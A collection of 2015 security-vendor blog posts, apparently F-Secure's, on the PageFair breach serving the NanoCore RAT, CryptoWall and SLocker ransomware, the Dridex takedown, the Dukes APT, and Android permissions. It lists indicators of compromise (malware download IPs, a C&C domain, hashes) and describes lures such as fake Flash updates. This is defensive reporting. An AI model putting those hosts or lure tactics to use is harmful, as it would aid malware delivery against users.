Halloween RAT: NanoCore Served Via PageFair Service

Over the weekend, PageFair, a counter ad-block solutions provider, was compromised via a spearphishing attack. The attackers performed a password reset which gave them access to PageFair’s account on a Content Distribution Network (CDN) service. The attackers then replaced PageFair’s Javascript to a malicious one:

Malicious Javascript: ads.min.js

This is what was shown to visitors of websites that used this PageFair service:

Fake Flash Player Warning

Fake Flash Player Warning

To give you a feel of how popular PageFair is, at least in terms of our user base, we pulled out hit statistics and found that it is ranked at 293 for the past 14 days. That’s higher than flickr.com (295), spotify.com (399), steampowered.com (406) and paypal.com (413). So this domain is quite a celebrity, which explained the spike that we saw during the breach.

Telemetry

Telemetry

During that time, we saw the malicious adobe_flashplayer_7.exe (6ad0393f506bc6e0a84f1325b3d75cca019c21bc) downloaded from these locations:

  • 75.126.160.35
  • 192.155.192.104
  • 184.173.28.170
  • 184.173.28.174
  • 184.173.28.175
  • 184.173.28.176
  • 168.1.88.118

The malware served from these links is a RAT called NanoCore. NanoCore provides plugins such as those related to Network, Security products and Surveillance.

NanoCore Plugins

The C&C of the particular malware sample related to the PageFair compromise was alotpro2.dynu.com (45.35.34.148).

Network Events

Network Events

Users that had our product enabled were protected against this threat at the time of the compromise through the detection Trojan:W32/Golroted.6ad0393f50!Online.

For more information about the PageFair breach and the status, you may read more about it from this link.



The Contents Of This CryptoWall Zip File Cost $1,000

“Payment is made successfully.”

This is CryptoWall’s Decrypter Service after ransom has been paid.

Payment is made successfully.

And this (decrypt.zip) is what you get for your money Bitcoin.

The contents of decrypt.zip.

It’s really not much to look at. But without a copy of your keys… you’ll never decrypt your files.

Which is probably why the FBI says:

To be honest, we often advise people just to pay the ransom.

Don’t want to find yourself needing to follow the FBI’s advice?

Then do this:

  • Back up your stuff!
  • Uninstall software and/or disable browser plugins that you don’t use.
  • Keep the software that you do use up to date.

@5ean5ullivan



SLocker Versus Marshmallow

Android ransomware SLocker recently began taking advantage of Android Lollipop flaws in a very serious (and devious) way. But how does SLocker fare against Android Marshmallow?

First, let’s take look at SLocker versus Lollipop.

Malvertising is typically used to bait men (yeah, probably just men) into downloading an app called “Porn Droid”.

Porn Droid app

Typically all-too-common sorts of overreaching permissions are requested.

PornPro app permissions

So that’s a small social engineering barrier at best.

PornPro permissions continued

If you have a good security app installed, you’ll see something such as this.

This app contains a virus

But if you don’t, and open the app, this is the prompt you’ll receive.

Disguised request for admin permissions

Update patch installation

That “Continue” button? It’s obfuscating a request for device administrator permissions. (A very big flaw, indeed.) And if you click to continue, SLocker will use its newly acquired admin privileges to launch its extortion scheme.

FBI-themed ransomware.

Slocker's FBI Warning

Slocker's FBI Warning

Slocker's FBI Warning

The FBI apparently accepts “PayPal My Cash” to pay the fine extortion.

PayPal My Cash

In its effort to intimidate the victim, SLocker takes a forward facing photo.

This example is pointed towards the ceiling above Zimry’s desk.

Slocker tries to take a picture.

And a PRISM logo is thrown in for good measure.

FBI Mission: PRISM

It’s worth mentioning at this point that it seems surprisingly easy to grant administrator rights to Android applications. Apple’s iOS requires a passcode for setting up something such as basic as a VPN. But Android only requires a simple “yes” to a prompt for administrator rights.

A good best computer security practice is to run as “user” from a restricted profile which limits installations. Applications seeking administrator rights then need to be installed from the “admin” profile and require a passcode. So we attempted to configure a restricted profile for ordinary use but found it difficult to manage. Android’s restricted profiles are designed for and focus on parental control and tablets. Setting up an additional profile on our test phone didn’t really result in the sort of device management we wanted. It only created an additional profile, not a restricted one.

By comparison, Apple’s iOS Restrictions are much more useful even for the primary device user.

But now…

How does Android Marshmallow fare against SLocker?

Good news! SLocker’s “continue” obfuscation fails on a phone running Marshmallow and so you’ll see just what giving administrator rights entails. It’s bad. The power to erase all data, to change the screen lock, and to set storage encryption. In other words, if you give SLocker administrators rights… you’re done. If the phone’s data isn’t backed up, there’s no getting it back other than giving into the extortioners.

Activate Device Administrator

But then the bad news: Android Marshmallow was released on October 5th and isn’t yet prevalent. So SLocker likely has a viable attack vector for quite some time to come.

Hashes:

0f25cefa85a0822a08ad23caca24a622fbf4aef0
12dc90592c1945fe647d04902b2707e756e88037
25311dfbc4961a661494a2767d2fb74c532539cc
68e7879074b9e2635d895616d4862383fe5960db
84b541957d7e42b4b7d95763fb48d03fcca21ffd
c0784e974da5b7e82e9921763f957e1f3ec024e7

 

Analysis of  Trojan:Android/Slocker.BJ provided by Zimry Ong.



Dridex Takedown

The UK National Crime Agency together with the FBI and the US Department of Justice recently filed charges against the author of Bugat/Cridex/Dridex. Andrey Ghinkul was arrested on August 28, 2015 in Cyprus and the US is now seeking his extradition. Dridex has reportedly caused multi-million dollar losses to financial institutions and businesses globally.

Dridex is known to propagate via Microsoft Word documents which pretend to be legitimate but contain malicious macro code. These macros will eventually download an executable from its C&C and/or a compromised website. F-Secure has generic detection (Trojan:W97M/MaliciousMacro.GEN) that specifically looks for malicious macros inside Office document files.

As the authorities are cleaning up the Dridex botnet, detections for malicious macros has been felt and a spike can be seen in our back end statistics.

F-Secure customers are protected by our Hydra (scanning engine) and DeepGuard (behavioral-based) technologies.

Virus and spyware history Trojan:W97M/MaliciousMacro.GEN

Trojan:W97M/MaliciousMacro.GEN detected.

F-Secure Internet Security, Harmful file removed

Harmful file removed.

Besides having generic signature detection of malicious macros, our DeepGuard behavioral engine also blocks. Two layers of protection are better than one.

F-Secure Internet Security, Application blocked

Application blocked for bad behavior.

A document dropping an executable? Yeah, that’s never a good thing.

Q: Are these Dridex activities all related to authorities taking down the botnet?
A: We don’t know.



Marshmallow Moves Android Towards iOS-like Permissions

Android 6.0 a.k.a. “Marshmallow” is now rolling out and its best new feature, from my point of view, is the introduction of a new permissions model.

Well-crafted applications can now ask for permissions as they are needed, rather than all at once during installation.

Android Marshmallow App Permissions

Source: Google

Apps designed for older versions of Android will still ask for numerous permissions upfront, but Marshmallow will allow for iOS-like granular control.

Marshmallow App Permissions Facebook

Not all apps will fail gracefully if permissions are denied.

Marshmallow App Permissions Deny Warning

But if for example you don’t want to use Facebook’s Find Friends feature, then there really shouldn’t be any need for the Facebook app to access your Contacts. I’d suggest denying various permissions and testing the “necessary evils” that you might have installed on your Marshmallow phone.

Conscientious developers will update their apps sooner than later.

And if they don’t… well, that’s what reviews are for. Right?

Android 6.0 Changes

See all of the changes to Android 6.0 here.

@5ean5ullivan



VB2015

Mikko missed VB2015 this year… allegedly.



CISA Q&A

On September 10, 2015 the US House (Select) Intelligence Committee held a hearing on World Wide Cyber Threats.

House (Select) Intelligence Committee Hearing on World Wide Cyber Threats – September 10, 2015

“Global Cyber Threats”

In his opening statement, ranking member Adam B. Schiff commented on the purpose of the Protecting Cyber Networks Act – the US House’s version of CISA.

House (Select) Intelligence Committee Hearing on World Wide Cyber Threats Transcript – Transcript

Source: C-SPAN

Here’s the full relevant text.

House (Select) Intelligence Committee Hearing on World Wide Cyber Threats – Schiff Opening Statement

 

So there you have it, the purpose of CISA is “to share malware.”

Q: And should you believe that?

A: Yeah, that’s its purpose: information sharing equals sharing malware samples.

Q: Is CISA a surveillance bill?

A: No it isn’t… not from where I sit at least.

Q: But is CISA a good bill?

A: No, I don’t think so.

Q: Why?

A: Because from my point of view, CISA appears to be nothing more than corporate welfare for the military-digital complex.

Q: Will CISA become law?

A: All signs point to… yes.

@5ean5ullivan



CryptoWall’s “Customer Journey” Sounds Like A Real Nightmare

The latest episode of Radiolab has what is without a doubt the best malware victim interview I’ve ever heard. Inna Simone’s computer was infected by CryptoWall late last year and based on her telling of it, the worst part of the experience was trying to buy the Bitcoin she needed to pay off the extortionists. In her words she was a “double victim!”.

CryptoWall Decrypter Service

Inna’s daughter, journalist Alina Simone, wrote about the experience in the January 2, 2015 edition of the New York Times. Both later appeared in an 8 minute segment on the April 18, 2015 airing of PBS NewsHour. But to get the full effect of Inna’s darkly humorous point of view, listen to the Radiolab story.

Here’s a screenshot of the related CryptoWall “Decrypter Service” which includes recommendations for numerous Bitcoin vendors.

CryptoWall Decrypter Service Instructions

“Although it’s not yet easy to buy bitcoins, it’s getting simpler every day.”

So, just how many people have been in the same situation as Inna? Good numbers are difficult to come by, but least 82,000 people have watched this CryptoWall Decrypter demo video.

YouTube Statistics CryptoWall Decrypter

In the image above, do you see the dip in daily views during January? Looks to me like CryptoWall took time off for Orthodox Christmas.

The amount of money CryptoWall demands varies based on location, but $500 USD seems to be fairly common. At that amount, if just 10 percent of 82,000 people pay, it’s worth 4.1 million dollars to the gang of extortionists.

Or a “little fee” as “Goldpis Isda” calls it.

Google Plus Goldpis Isda

@5ean5ullivan



The Dukes: 7 Years Of Russian Cyber-Espionage

The Dukes

Today we release a new whitepaper on an APT group commonly referred to as “the Dukes”. We believe that the Dukes are a well-resourced, highly dedicated, and organized cyber-espionage group that has been working for the Russian government since at least 2008 to collect intelligence in support of foreign and security policy decision-making.

The Dukes (sometimes also referred to as APT29) are known to employ a wide arsenal of malware toolsets including MiniDuke, CosmicDuke, OnionDuke, CozyDuke, SeaDuke, CloudDuke (aka MiniDionis), and HammerDuke (aka HAMMERTOSS [PDF]).

Despite the extensive technical research by us and others into many of the toolsets of the Dukes, we felt that we were still missing crucial parts of the story. Meanwhile, others had envisioned how the story might look, but had concluded that “it is difficult to lead the defense against that which one is not aware of or does not comprehend.” (Maldre, 2015)

With this in mind, we recently set out on a journey back through all of our previous research on the Dukes looking for clues and threads that we might have missed or whose importance we might not have understood at the time. Through this process, we were able to uncover clues pointing to the existence of two previously unidentified Duke malware toolsets, PinchDuke and GeminiDuke.

Timeline of known activity for the various Duke toolkits.

While we had previously analyzed malware from both toolsets, what we hadn’t understood at the time was their context. With the discovery of new clues such as these two toolsets, we went rummaging through our troves of old malware searching for cases that we had previously not known to attribute to the Dukes. Through this process of proverbial connect-the-dots, we were able to slowly build a bigger, better picture of the Dukes and uncover new details of their over 7 years of activities.

The whitepaper [PDF], with all of these juicy details (plus sample hashes), is available here.

The Dukes – TLP: White



Another LinkedIn Sockpuppet

According to LinkedIn, 11 of my connections can introduce me to someone who “knows” Anna.

https://hk.linkedin.com/pub/anna-sentina/100/757/193

Sr Researcher at “Head Hunter”.

I’m not so sure about that.

According to IMDb, Anna Sentina is really Anna Akana.

http://www.imdb.com/name/nm4331196/

Anna’s IMDb profile.

Maybe LinkedIn should start charging to “verify” recruiter accounts?

At the moment, there’s zero overhead when creating a recruiter sockpuppet. Adding at least some amount of cost would do two things. First, it would add value to actual recruiters. And second, it would help clean out the fakes as LinkedIn’s security team could then scrutinize the accounts of so-called recruiters who decide not to verify. Alternatively, accounts claiming to be recruiters that aren’t verified could be labeled as “unverified”.

But that’s probably not going to happen anytime soon. So for now, try to be selective with your LinkedIn connections.

@5ean5ullivan

Related: LinkedIn Sockpuppets Are Targeting Security Researchers



Can the “Speakularity” Be Secured?

In December 2010, journalist Matt Thompson predicted a future in which “automatic speech transcription will become fast, free, and decent.” He called this future the “Speakularity” – playing on the concept of the technological singularity. In Thompson’s words: “So much of the raw material of journalism consists of verbal exchanges — phone conversations, press conferences, […]

2015-09-14

Freedome Tracking Protection Comparison

Labs Fellow Edilberto Cajucom recently tested¹ our Freedome VPN‘s Tracking Protection feature to measure its effect on the page load speed and size of numerous popular sites. Here’s a graph of speed comparisons using a subset of sites from Alexa’s news category. As you can see, there’s quite a measurable effect on several sites; Huffington […]

2015-09-11

Apple iOS 9 Security Features

Apple’s September Event 2015 takes place today so 9/9 = iOS 9 announcements. Apple is promising improved security with iOS 9. Implementing six-digit passcodes for Touch ID is one well publicized example. Security researcher Frederic Jacobs has an excellent summary of other documented changes on Medium. A small change that I’ve noticed while testing iOS […]

2015-09-09

Sofacy Recycles Carberp and Metasploit Code

1. Introduction The Sofacy Group (also known as Pawn Storm or APT28) is well known for deploying zero-day exploits in their APT campaigns. For example, two recent zero-days used by the Sofacy Group were exploiting vulnerabilities in Microsoft Office CVE-2015-2424 and Java CVE-2015-2590. If the exploit is successful, it installs a Sofacy downloader component, which is different from […]

2015-09-08

Buy Your Freedome With Cash Money

Our Freedome sales team ran a special promotion over the weekend and when I Tweeted about it, several people asked about the privacy of our payments processor. Short answer is this: we don’t get any access to your personal information. But what if you still don’t want to deal with ecommerce? No problem. You can […]

2015-09-07

Today’s Best Email

Software engineers automate everything… Goodbye “Markov”!

2015-09-04

LinkedIn Sockpuppets Are Targeting Security Researchers

Multiple LinkedIn accounts recently targeted numerous security specialists in an attempt to map their social graphs. Several of our researchers received these LinkedIn invitations themselves and Daavid from our Threat Intelligence team decided to investigate. Here’s an example of one so-called “recruiter” account. Areas of interest include pen testing and social engineering? You don’t say. […]

2015-09-03

You’ve Got Robot Mail

I listened to the BBC World Service’s Click podcast this morning during my commute and learned that Posti (Finland’s postal services provider) is testing drone delivery. Posti has a video of the “robottikopteri” in action on its YouTube channel. Coincidentally, on my walk home last night, I heard the sound of a quadcopter flying around […]

2015-09-02

Trackers Are Out Of Control

Modern web analytics and tracking are completely out of control. And it’s not even a privacy issue for me at this point – it’s more about usability. Trackers are practically recreating the “dial-up Internet” experience. (Ask your parents, kids.) It’s 2015 – but a lot of websites load like it’s 1999. And it seems like […]

2015-09-01

Visiting INTERPOL’s New Complex

Me and Su Gim Goh from our Malaysian lab had a chance this week to visit INTERPOL’s new Global Complex for Innovation which is located in Singapore. Inside, a fleet of analysts from around the world investigate international crime – including cyber-crime. While we can’t go into details, it was nevertheless impressive to see the level of […]

2015-08-28